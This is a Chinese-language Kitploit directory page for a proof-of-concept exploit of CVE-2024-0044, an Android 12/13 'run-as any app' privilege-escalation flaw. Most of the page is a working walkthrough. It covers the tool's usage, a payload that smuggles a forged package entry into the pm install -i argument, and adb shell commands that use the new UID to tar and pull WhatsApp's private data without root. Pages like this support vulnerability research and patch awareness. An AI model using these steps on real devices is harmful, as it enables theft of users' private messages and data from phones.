Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
c-CVE-2024-0044 — CVE-2024-0044:一种高严重性漏洞,类型为“以任意应用身份执行”,影响 Android 12 和 13 版本。 | Kitploit
工具/GitHubGitHub/007criptografia/c-cve-2024-0044
Android安全权限提升漏洞分析漏洞利用移动应用渗透测试数据泄露后渗透利用渗透测试移动安全
GitHub007criptografia/c-cve-2024-0044

c-CVE-2024-0044

CVE-2024-0044:一种高严重性漏洞,类型为“以任意应用身份执行”,影响 Android 12 和 13 版本。

412年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE 2024 0044

CVE-2024-0044 是在 PackageInstallerService.java 文件的 createSessionInternal 函数中发现的一个高严重性漏洞,影响 Android 12 和 13 版本。该漏洞允许攻击者执行 "以任意应用身份运行" 攻击,导致本地权限提升,无需用户交互。问题源于 createSessionInternal 函数中的不当输入验证。攻击者可以通过操纵会话创建过程来利用此漏洞,从而可能未经授权访问敏感数据并在受影响的设备上执行未授权操作。

该漏洞由 Meta 安全 发现

概念验证由 Tiny hack 总结并分享

有关安全补丁的详细信息,请参阅 Android 安全公告

先决条件

  1. 在手机上启用USB调试,并通过USB数据线或无线调试连接到你的机器。
  2. 在你的机器上下载任意APK,你可以使用 F-DROID

如何使用该工具

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P 用于指定你想以之运行的目标包名

-A 用于指定推送到设备中的APK文件路径

利用

运行工具 python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

将会生成一个如下的 payload.txt 文件

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

该工具自动完成部分操作,其余部分需手动进行。你可以在生成payload后退出,手动运行所有命令,也可以按照说明继续操作

接下来,你需要通过adb shell连接到设备,粘贴payload,并确保最后一条命令返回 Success 消息

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

接着,使用以下命令获取WhatsApp数据

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

创建一个临时目录:mkdir /data/local/tmp/wa/

为tar文件创建一个占位符:touch /data/local/tmp/wa/wa.tar

设置宽松权限:chmod -R 0777 /data/local/tmp/wa/ 确保任何用户都能在该目录中读取、写入和执行。

切换用户上下文:run-as victim 以获得与“victim”用户相同的权限。

归档目标应用的数据:tar -cf /data/local/tmp/wa/wa.tar com.whatsapp,创建WhatsApp数据目录的tarball。

最后拉取数据

adb pull /data/local/tmp/wa/wa.tar

你可以使用 7z 或其他工具解压数据

你可以使用 Whatsapp聊天导出工具 将其转换为HTML

这样无需root权限即可获取设备上的WhatsApp数据

下载工具